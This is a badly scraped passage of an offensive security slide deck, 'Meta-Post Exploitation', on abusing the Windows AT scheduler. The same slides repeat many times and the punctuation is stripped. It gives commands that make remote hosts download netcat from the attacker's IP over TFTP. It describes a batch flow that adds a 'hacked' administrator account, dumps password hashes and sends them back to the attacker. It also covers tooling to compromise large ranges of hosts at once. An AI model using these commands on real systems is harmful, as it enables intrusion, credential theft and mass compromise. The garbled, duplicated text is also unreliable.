- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet